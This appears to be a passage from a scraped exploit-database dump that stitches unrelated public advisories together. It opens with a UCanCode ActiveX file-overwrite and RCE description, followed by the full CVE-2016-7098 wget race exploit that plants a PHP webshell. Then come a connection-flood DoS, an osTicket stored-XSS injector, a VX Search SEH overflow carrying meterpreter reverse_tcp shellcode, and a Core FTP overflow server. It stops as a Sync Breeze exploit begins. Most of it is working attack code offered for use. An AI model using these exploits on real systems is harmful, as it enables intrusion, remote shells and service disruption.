Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Function SaveMemory2 (ByVal filename As String , ByVal pData As Long , ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Function SaveTemplateToFile (ByVal strFile As String) As Boolean
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Function SaveMemory2 (ByVal filename As String , ByVal pData As Long , ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Function SaveTemplateToFile (ByVal strFile As String) As Boolean
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C}
Function SaveMemory2 (ByVal filename As String , ByVal pData As Long , ByVal nSize As Long) As Boolean
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C}
Function SaveTemplateToFile (ByVal strFile As String) As Boolean
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Function SaveDocument (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Function SaveTemplateToFile (ByVal strFile As String) As Boolean
----------------------------------------
3) various Write methods:
----------------------------------------
Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX
Class: UCCSIMPLE {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx
Class: UCCHMI {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
PROOF OF CONCEPT:
<html>
<object classid="clsid:B6A3BF2C-F770-4182-BE7F-103BF2C76826" id="test"></object>
<script language = "vbscript">
test.SaveTemplateToFile buff,C:\Windows\_system.ini
</script>
</html>
----------------------------------------
----------------------------------------
REMOTE CODE EXECUTION
This product is so poor coded that remote code execution is possible using a lot of functions (and I'm lazy),
so here it is the description of just one of it, "AddDWordUserProperty":
CPU Disasm
Address Hex dump Command Comments
...
...
1007FEB5 |. 8D5424 44 LEA EDX,[LOCAL.36]
1007FEB9 |. 51 PUSH ECX
1007FEBA |. 8B06 MOV EAX,DWORD PTR DS:[ESI] <- WE CAN CONTROL ESI
1007FEBC |. 52 PUSH EDX
1007FEBD |. 8BCE MOV ECX,ESI
1007FEBF |. C78424 DC0000 MOV DWORD PTR SS:[LOCAL.0],0
1007FECA |. 897C24 10 MOV DWORD PTR SS:[LOCAL.51],EDI
1007FECE |. FF90 04030000 CALL DWORD PTR DS:[EAX+304]
1007FED4 |. 85C0 TEST EAX,EAX
...
...
Registers:
CPU - thread 9. (00000B38), module UCCVIE~1_OCX
EAX 015DD1D0
ECX 015DD194
EDX 015DD1D0
EBX 00000000
ESP 015DD188
EBP 015DD300
ESI 41414141 <- FIRST ARGUMENT PASSED TO AddDWordUserProperty METHOD
EDI 42424242 <- SECOND ARGUMENT PASSED TO AddDWordUserProperty METHOD
EIP 1007FEBA UCCVIE~1_OCX.1007FEBA
----------------------------------------------------------------------
We can use it to pass a valid memory address so that we can find a more comfortable situation :)
CPU Disasm
Address Hex dump Command Comments
...
...
1007FEB5 |. 8D5424 44 LEA EDX,[LOCAL.36]
1007FEB9 |. 51 PUSH ECX
1007FEBA |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
1007FEBC |. 52 PUSH EDX
1007FEBD |. 8BCE MOV ECX,ESI
1007FEBF |. C78424 DC0000 MOV DWORD PTR SS:[LOCAL.0],0
1007FECA |. 897C24 10 MOV DWORD PTR SS:[LOCAL.51],EDI
1007FECE |. FF90 04030000 CALL DWORD PTR DS:[EAX+304] <- WE NOW ARE IN CONTROL OF EAX
1007FED4 |. 85C0 TEST EAX,EAX
...
...
Registers
CPU - thread 9. (00000B38), module UCCVIE~1_OCX
EAX 45454545 <- THIS VALUE THAT WAS PREVIOUSLY STORED IN MEMORY, IF WE CHANGE IT IN ANOTHER VALID ADDRESS...
ECX 00030040 ASCII "EEEE"
EDX 015DD1D0
EBX 00000000
ESP 015DD184
EBP 015DD300
ESI 00030040 ASCII "EEEE"
EDI 42424242
EIP 1007FECE UCCVIE~1_OCX.1007FECE
And...
CPU - thread 9. (00000B38)
EAX 0002FDBC
ECX 00030040 ASCII "EEEE"
EDX 015DD1D0
EBX 00000000
ESP 015DD180
EBP 015DD300
ESI 00030040 ASCII "EEEE"
EDI 42424242
EIP 46464646 <- BINGO :)
----------------------------------------
----------------------------------------
BONUS STAGE:
There are a huge number of DoS... happy hunting :)
Peace, your friendly neighborhood shinnai.
---------------------------------------------------------------------
'''
=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com
- https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html
- CVE-2016-7098
- Release date: 24.11.2016
- Revision 1.0
- Severity: Medium
=============================================
I. VULNERABILITY
-------------------------
GNU Wget < 1.18 Access List Bypass / Race Condition
II. BACKGROUND
-------------------------
"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and
FTP, the most widely-used Internet protocols.
It is a non-interactive commandline tool, so it may easily be called from
scripts, cron jobs, terminals without X-Windows support, etc.
GNU Wget has many features to make retrieving large files or mirroring entire
web or FTP sites easy
"
https://www.gnu.org/software/wget/
III. INTRODUCTION
-------------------------
GNU wget in version 1.17 and earlier, when used in mirroring/recursive mode,
is affected by a Race Condition vulnerability that might allow remote attackers
to bypass intended wget access list restrictions specified with -A parameter.
This might allow attackers to place malicious/restricted files onto the system.
Depending on the application / download directory, this could potentially lead
to other vulnerabilities such as code execution etc.
IV. DESCRIPTION
-------------------------
When wget is used in recursive/mirroring mode, according to the manual it can
take the following access list options:
"Recursive Accept/Reject Options:
-A acclist --accept acclist
-R rejlist --reject rejlist
Specify comma-separated lists of file name suffixes or patterns to accept or
reject. Note that if any of the wildcard characters, *, ?, [ or ], appear in
an element of acclist or rejlist, it will be treated as a pattern, rather
than a suffix."
These can for example be used to only download JPG images.
It was however discovered that when a single file is requested with recursive
option (-r / -m) and an access list ( -A ), wget only applies the checks at the
end of the download process.
This can be observed in the output below:
# wget -r -nH -A '*.jpg' http://attackersvr/test.php
Resolving attackersvr... 192.168.57.1
Connecting to attackersvr|192.168.57.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: ‘test.php’
15:05:46 (27.3 B/s) - ‘test.php’ saved [52]
Removing test.php since it should be rejected.
FINISHED
Although wget deletes the file at the end of the download process, this creates
a race condition as an attacker with control over the URL/remote server could
intentionally slow down the download process so that they had a chance to make
use of the malicious file before it gets deleted.
It is very easy to win the race as the file only gets deleted after the HTTP
connection is terminated. The attacker could therefore keep the connection open
as long as it was necessary to make use of the uploaded file as demonstrated
in the proof of concept below.
V. PROOF OF CONCEPT EXPLOIT
------------------------------
Here is a simple vulnerable PHP web application that uses wget to download
images from a user-provided server/URL:
---[ image_importer.php ]---
<?php
// Vulnerable webapp [image_importer.php]
// Uses wget to import user images from provided site URL
// It only accepts JPG files (-A wget option).
if ( isset($_GET['imgurl']) ) {
$URL = escapeshellarg($_GET['imgurl']);
} else {
die("imgurl parameter missing");
}
if ( !file_exists("image_uploads") ) {
mkdir("image_uploads");
}
// Download user JPG images into /image_uploads directory
system("wget -r -nH -P image_uploads -A '*.jpg' $URL 2>&1");
?>
----------------------------
For example:
https://victimsvr/image_importer.php?imgurl= href="http://images/logo.jpg">http://images/logo.jpg
will cause wget to upload logo.jpg file into:
https://victimsvr/images_uploads/logo.jpg
The wget access list (-A) is to ensure that only .jpg files get uploaded.
However due to the wget race condition vulnerability an attacker could use
the exploit below to upload an arbitrary PHP script to /image_uploads directory
and achieve code execution.
---[ wget-race-exploit.py ]---
'''
#!/usr/bin/env python
#
# Wget < 1.18 Access List Bypass / Race Condition PoC Exploit
# CVE-2016-7098
#
# Dawid Golunski
# https://legalhackers.com
#
#
# This PoC wget exploit can be used to bypass wget -A access list and upload a malicious
# file for long enough to take advantage of it.
# The exploit sets up a web server on port 80 and waits for a download request from wget.
# It then supplies a PHP webshell payload and requests the uploaded file before it gets
# removed by wget.
#
# Adjust target URL (WEBSHELL_URL) before executing.
#
# Full advisory at:
#
# https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html
#
# Disclaimer:
#
# For testing purposes only. Do no harm.
#
#
import SimpleHTTPServer
import time
import SocketServer
import urllib2
import sys
HTTP_LISTEN_IP = '0.0.0.0'
HTTP_LISTEN_PORT = 80
PAYLOAD='''
<?php
//our webshell
system($_GET["cmd"]);
system("touch /tmp/wgethack");
?>
'''
# Webshell URL to be requested before the connection is closed
# i.e before the uploaded "temporary" file gets removed.
WEBSHELL_URL="http://victimsvr/image_uploads/webshell.php"
# Command to be executed through 'cmd' GET paramter of the webshell
CMD="/usr/bin/id"
class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
# Send the payload on GET request
print "[+] Got connection from wget requesting " + self.path + " via GET :)\n"
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write(PAYLOAD)
print "\n[+] PHP webshell payload was sent.\n"
# Wait for the file to be flushed to disk on remote host etc.
print "[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...\n"
time.sleep(2)
# Request uploaded webshell
print "[+} File '" + self.path + "' should be saved by now :)\n"
print "[+} Executing " + CMD + " via webshell URL: " + WEBSHELL_URL + "?cmd=" + CMD + "\n"
print "[+} Command result: "
print urllib2.urlopen(WEBSHELL_URL+"?cmd="+CMD).read()
print "[+} All done. Closing HTTP connection...\n"
# Connection will be closed on request handler return
return
handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)
print "\nWget < 1.18 Access List Bypass / Race Condition PoC Exploit \nCVE-2016-7098\n\nDawid Golunski \nhttps://legalhackers.com \n"
print "[+} Exploit Web server started on HTTP port %s. Waiting for wget to connect...\n" % HTTP_LISTEN_PORT
handler.serve_forever()
'''
------------------------------
If the attacker run this exploit on their server ('attackersver') and pointed
the vulnerable script image_importer.php at it via URL:
https://victimsvr/image_importer.php?imgurl= href="http://attackersvr/webshell.php">http://attackersvr/webshell.php
The attacker will see output similar to:
root@attackersvr:~# ./wget-race-exploit.py
Wget < 1.18 Access List Bypass / Race Condition PoC Exploit
CVE-2016-7098
Dawid Golunski
https://legalhackers.com
[+} Exploit Web server started on HTTP port 80. Waiting for wget to connect...
[+] Got connection from wget requesting /webshell.php via GET :)
victimsvr - - [24/Nov/2016 00:46:18] "GET /webshell.php HTTP/1.1" 200 -
[+] PHP webshell payload was sent.
[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...
[+} File '/webshell.php' should be saved by now :)
[+} Executing /usr/bin/id via webshell URL: http://victimsvr/image_uploads/webshell.php?cmd=/usr/bin/id
[+} Command result:
uid=33(www-data) gid=33(www-data) groups=33(www-data),1002(nagcmd)
[+} All done. Closing HTTP connection...
VI. BUSINESS IMPACT
-------------------------
The vulnerability might allow remote servers to bypass intended wget access list
restrictions to temporarily store a malicious file on the server.
In certain cases, depending on the context wget command was used in and download
path, this issue could potentially lead to other vulnerabilities such as
script execution as shown in the PoC section.
VII. SYSTEMS AFFECTED
-------------------------
Wget < 1.18
VIII. SOLUTION
-------------------------
Update to latest version of wget 1.18 or apply patches provided by the vendor.
IX. REFERENCES
-------------------------
https://legalhackers.com
https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html
https://legalhackers.com/exploits/CVE-2016-7098/wget-race-exploit.py
https://www.gnu.org/software/wget/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7098
https://security-tracker.debian.org/tracker/CVE-2016-7098
http://lists.opensuse.org/opensuse-updates/2016-09/msg00044.html
http://lists.gnu.org/archive/html/bug-wget/2016-08/msg00124.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7098
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
https://legalhackers.com
XI. REVISION HISTORY
-------------------------
24.11.2016 - Advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
'''
# Exploit Title: Remote Utilities - Host 6.3 - Denial of Service
# Date: 2016-11-25
# Exploit Author: Peter Baris
# Vendor Homepage: www.remoteutilities.com
# Software Link: http://saptech-erp.com.au/resources/executables/host6.3.zip
# Version: 6.3.0.6 - (other version are also affected below version 6.5 beta 3)
# Tested on: Windows 7 SP1 x64 and Windows Server 2008 R2
# After the notification, the company released a fix in version 6.5 beta 3
# On Windows 7 - the software refuses connections after execution.
# On Windows 2008 R2 it caused 100% CPU usage and occasional server crash when 1 core was assigned
#!/usr/bin/python
import socket
counter=0
while (counter <= 5000):
counter=counter+1
print(counter)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('<host address>',5650))
s.close()
# Exploit Title: Osticket 1.9.14 and below (X-Forwarded-For) Stored XSS.
# Date: 24-11-2016
# Exploit Author: Joaquin Ramirez Martinez [ i0-SEC ]
# Software Link: http://osticket.com/
# Vendor: Osticket
"""
==============
DESCRIPTION
==============
**osTicket** is a widely-used open source support ticket system. It seamlessly
integrates inquiries created via email, phone and web-based forms into a
simple easy-to-use multi-user web interface. Manage, organize and archive
all your support requests and responses in one place while providing your
customers with accountability and responsiveness they deserve.
(copy of Osticket - README.md)
=======================
VULNERABILITY DETAILS
=======================
file `osticket/upload/bootstrap.php` contains this
snippet of code (line 337-340):
...
if (isset($_SERVER['HTTP_X_FORWARDED_FOR']))
// Take the left-most item for X-Forwarded-For
$_SERVER['REMOTE_ADDR'] = trim(array_pop(
explode(',', $_SERVER['HTTP_X_FORWARDED_FOR'])));
....
The $_SERVER['REMOTE_ADDR'] value gets overrided with the `X-Forwarded-For` header value,
at this point, it is not a vulnerability but...
file `osticket/upload/include/class.osticket.php` line 309-315 :
...
//Save log based on system log level settings.
$sql='INSERT INTO '.SYSLOG_TABLE.' SET created=NOW(), updated=NOW() '
.',title='.db_input(Format::sanitize($title, true))
.',log_type='.db_input($loglevel[$level])
.',log='.db_input(Format::sanitize($message, false))
.',ip_address='.db_input($_SERVER['REMOTE_ADDR']);
db_query($sql, false);
....
Everytime when a csrf attack is dettected (checking `X_CSRFTOKEN` header or the post parameter `__CSRFToken__`),
Osticket saves into database the user controled value $_SERVER['REMOTE_ADDR'] even if it has an invalid format.
Finally the XSS is triggered when a user who can see the system logs like an administrator, visits
the /scp/logs.php URI. It happens because osticket does not encode the output of the data stored into the database.
The code responsible for lanching the XSS is located in `osticket/upload/include/staff/syslogs.inc-php`
line 142...
...
<td><?php echo $row['ip_address']; ?></td>
...
So...
An attacker can make an HTTP request with a header `X-Forwarded-For` containing the XSS payload
with an invalid CSRF token to the login interface waiting for an administrator to view the logs and trigger the XSS.
================
DEMONSTRATION
================
Demo video: https://www.youtube.com/watch?v=lx_WlL89F70
The demo also show a low severity XSS vulnerability in the helpdesk name/title of osticket.
================
REFERENCES
================
https://github.com/osTicket/osTicket/releases
https://github.com/osTicket/osTicket/releases/tag/v1.9.15
X-Forwarded-For XSS:
https://github.com/osTicket/osTicket/pull/3439
https://github.com/osTicket/osTicket/commit/4396f91cdc990b7da598a7562eb634b89314b631
heldeskt name/tile XSS:
https://github.com/osTicket/osTicket/pull/3439
https://github.com/osTicket/osTicket/commit/2fb47bd84d1905b49beab05fcf3f01b00a171c37
================
MITIGATIONS
================
update to version 1.9.15 or later
================
CREDITS
================
Vulnerability discovered by Joaquin Ramirez Martinez
https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q/videos
https://twitter.com/rammarj
================
TIMELINE
================
13-07-2016 - Vulnerability found
19-09-2016 - Osticket knew the flaws
01-11-2016 - Osticket patches vulnerabilities (v1.9.15 released)
24-11-2016 - Public disclosure.
"""
import urllib
import urllib2
from optparse import OptionParser
options = OptionParser(usage='python %prog [options]', description='Stored XSS')
options.add_option('-t', '--target', type='string', default='http://localhost', help='(required) example: http://localhost')
options.add_option('-p', '--path', type='string', default='/', help='osticket path. Default: /')
options.add_option('-x', '--payload', type='string', default='<svg/onload=alert(/Osticket_XSSed_by_i0-sec/)>'
, help='xss payload. Default: "<svg/onload=alert(/Osticket_XSSed_by_i0-sec/)>"')
banner = """
======================================================
OSTICKET
"The most popular ticketing system in the world"
Stored XSS
by i0-sec (Joaquin R. M.)
======================================================
"""
def main():
opts,args = options.parse_args()
print(banner)
server = opts.target
path = opts.path
body = urllib.urlencode({"__CSRFToken__":"invalid", "do":"scplogin", "userid":"invalid", "passwd":"invalid", "submit":""})
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36",
"Content-type": "application/x-www-form-urlencoded", "X-Forwarded-For": opts.payload}
url = server+path+"/scp/login.php" #default login interface URI for OSTICKET
print('[+] Connecting to '+server+path)
req = urllib2.Request(url, body, headers)
try:
print('[+] Sending payload... ')
response = urllib2.urlopen(req)
html = response.read()
except Exception, e:
pass
print '[+] Payload sent.'
print '[+] Completed.\n'
if __name__ == '__main__':
main()
#!/usr/bin/python
print "VX Search Enterprise 9.1.12 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security
#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1
#Vendor has been notified on multiple occasions
#Exploit for version 9.0.26: www.exploit-db.com/exploits/40455/
#Shout-out to carbonated and ozzie_offsec
import socket
import sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))
#bad chars \x00\x0a\x0d\x26
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
#payload size 308
buf = ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"
#pop pop ret 10015BBE
nseh = "\x90\x90\xEB\x0B"
seh = "\xBE\x5B\x01\x10"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
evil = "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "B" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CORE-FTP-REMOTE-SSH-SFTP-BUFFER-OVERFLOW.txt
[+] ISR: ApparitionSec
Vendor:
===============
www.coreftp.com
Product:
========================
Core FTP LE (client)
v2.2 build 1883
Core FTP LE - free Windows software that includes the client FTP features
you need. Features like SFTP (SSH), SSL, TLS, FTPS, IDN,
browser integration, site to site transfers, FTP transfer resume, drag and
drop support, file viewing & editing, firewall support,
custom commands, FTP URL parsing, command line transfers, filters, and
much, much more.
Vulnerability Type:
================================
Remote SSH/SFTP Buffer Overflow
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Core FTP client is vulnerable to remote buffer overflow denial of service
when connecting to a malicious server using
SSH/SFTP protocol.
Upon receiving an overly long string of junk from the malicious FTP server
response, Core FTP crashes and the stack
is corrupted with several registers EBX, EDX, EDI being overwritten as can
be seen below.
WinDbg dump...
(d9c.16d8): Access violation - code c0000005 (first/second chance not
available)
eax=035b0000 ebx=00004141 ecx=03ac7e40 edx=41414141 esi=03ac7e38
edi=41414141
eip=77313ac3 esp=0439fa10 ebp=0439fae0 iopl=0 nv up ei pl nz ac pe
nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010216
ntdll!RtlImageNtHeader+0x92f:
77313ac3 8b12 mov edx,dword ptr [edx]
ds:002b:41414141=????????
Exploit code(s):
===============
import socket
print 'hyp3rlinx - Apparition Security'
print 'Core FTP SSH/SFTP Remote Buffer Overflow / DOS\r\n'
host='127.0.0.1'
port = 22
s = socket.socket()
payload="A"*77500
s.bind((host, port))
s.listen(5)
print 'Listening on port... %i' %port
print 'Connect to me!'
while True:
conn, addr = s.accept()
conn.send(payload+'\r\n')
conn.close()
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
#!/usr/bin/python
print "Sync Breeze Enterprise 9.1.16 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security
#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1
#Vendor has been notified on multiple occasions
#Exploit for version 8.9.24: www.exploit-db.com/exploits/40456/
#Shout-out to carbonated and ozzie_offsec
import socket
import sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
